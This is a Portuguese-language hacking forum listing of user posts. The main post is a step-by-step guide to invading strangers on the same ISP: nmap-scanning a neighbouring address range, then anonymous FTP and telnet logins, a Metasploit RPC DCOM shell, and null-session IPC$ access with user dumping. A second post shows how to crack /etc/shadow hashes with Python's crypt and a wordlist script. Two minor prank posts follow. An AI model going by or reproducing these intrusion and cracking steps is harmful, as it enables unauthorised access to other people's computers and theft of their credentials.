Hacker | Invasão
-
Basta abrir o console (F12) e ir na aba console e aplicar o seguinte código
- 4.890 visualizações
- 9 comentários
Por asdasad33Enviado -
-
Estes ataques precisam ter pessoas do mesmo provedor que você.
Vamos começar:
1. Pegue o seu ip externo(sugestão: www.meuip.com.br).
2. Baixe o nmap e instale no seu pc.
3. Vamos supor que o seu ip seja: 201.33.22.18.
4. Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.
Prosseguindo…
5. Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.
6. digite:
nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44
Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
7. Código:
Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164
Invasao pela porta 21
vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.
Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a
Invasao pela porta 23
Iniciar>Executar>cmd>telnet>open>201.33.22 23
Invasao pela porta 135
CASO a porta 135 aberta, podemos usar o METASPLOIT
abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.
depois disso escolha o tipo de conexao como: GERENICSHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.
depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445
Esta porta é de compartilhamento.
Iniciar>Executar>cmd>net use .45.241.175ipc$ “” /u:”"
Comando concluído com êxito.
baixa o Dumpusers
ponha ele no ?
abra o cmd digite;
dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:
iniciar>executar>.45.241.175c$
- 1.817 visualizações
- 0 comentários
Por flavindupneuEnviado -
from time import sleep from pyautogui import press, typewrite t = open("roteiro.txt" , "r") for x in t: typewrite(word) press("enter") sleep(0)
O código, é esse. Entretanto, na mesma pasta na qual estiver o arquivo em Python, você vai precisar colocar o roteiro em txt nela. (E caso ele tenha um nome diferente, é só alterar no código)
É algo que dá pra gerar algumas risadas.- 5.233 visualizações
- 0 comentários
Por KrillEnviado -
Sabemos que existem vários scripts já prontos para quebrar senhas do Linux, porém melhor do que saber usar alguma ferramenta pronta, é saber como ela funciona e como criar seu script. Por este motivo iremos mostrar como criar um script em python para quebrar senhas do Linux através de uma wordlist.
Primeiramente precisamos entender como funcionar as senhas no Linux, as senhas no Linux são armazenadas no arquivo /etc/shadow e este arquivo armazena a senha real no formato criptografado (mais parecido com o hash da senha) para a conta do usuário com propriedades adicionais relacionadas à senha do usuário. Basicamente, ele armazena informações seguras da conta do usuário. Todos os campos são separados por dois pontos (:). Ele contém uma entrada por linha para cada usuário listado no arquivo /etc/passwd, conforme exemplo abaixo.
[root@centos ~]# head -n1 /etc/shadow
root:$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/:17700:0:99999:7::
1º Campo: Usuário de acesso.
2º Campo: Senha do usuário criptografada.
A senha deve ter no mínimo 8 a 12 caracteres, incluindo caracteres especiais, dígitos, letras minúsculas e muito mais. Geralmente o formato da senha é definido como $id$salt$hash, O $id é o algoritmo usado no GNU/Linux da seguinte forma:
$1$ – MD5
$2a$ – Blowfish
$2y$ – Blowfish
$5$ – SHA-256
$6$ – SHA-512
Vamos apenas focar nos dois primeiros campos pois somente iremos usar eles para descobrirmos a senha do usuário.
Agora vamos para o que interessa, primeiro iremos executar os comandos no modo interativo e no final irei deixar o exemplo de um script para automatizar o processo.
Execute o comando python no Linux:
[root@centos ~]# python
Python 2.7.5 (default, Aug 4 2017, 00:39:18)
[GCC 4.8.5 20150623 (Red Hat 4.8.5-16)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
Importe a biblioteca crypt:
>>> import crypt
Crie uma variável com id e o salt da senha contida no arquivo shadow:
>>> salt = "$6$UXCFfDA3"
Agora iremos executar a função crypt e analisar a saída do comando:
>>> crypt.crypt("password", salt) '$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/'
A função crypt recebe dois parâmetros, sendo eles, uma senha e o salt com o id. Neste caso estamos passando a senha sendo “password” e o salt com o id que pegamos no arquivo shadow “$6$UXCFfDA3”.
Podemos notar que a saída do comando crypt é exatamente igual a linha que temos no arquivo shadow para o usuário root:
[root@centos ~]# head -n1 /etc/shadow
root:$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/:17700:0:99999:7:::
>>> crypt.crypt("password", salt)
'$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/'
Comparando as duas saídas, podemos identificar que a senha do usuário root neste caso é password.
Agora conforme prometido, segue o script automático ao qual você irá passar o arquivo shadow e uma wordlist como parâmetro e ele fará todo o resto!
[root@centos ~]# cat HSLinuxPWD.py
Use o código: https://github.com/TiagoANeves/TDTLinuxPWD
Executando o script:
[root@centos ~]# python HSLinuxPWD.py -s /etc/shadow -w wordlist.txt
Iniciando o programa...
Bruteforcing a senha do usuario root
Testando a senha 123456
Testando a senha 12345
Testando a senha 123456789
Testando a senha password
Senha encontrada! Password
Obrigado e até o próximo tutorial!
- 3.568 visualizações
- 4 comentários
Por Renato RibeiroEnviado -
Se você quer zoar seus amigos simulando uma atualização INFINITA de sistema operacional, é bem fácil!
Acesse http://fakeupdate.net/ Clique na tela correspondente ao sistema operacional desejado. Aperte F11 para deixar a tela em FULLSCREEN. Aí é só olhar o tonto esperando terminar a atualização.- 4.292 visualizações
- 8 comentários
Por 403 - ForbiddeenEnviado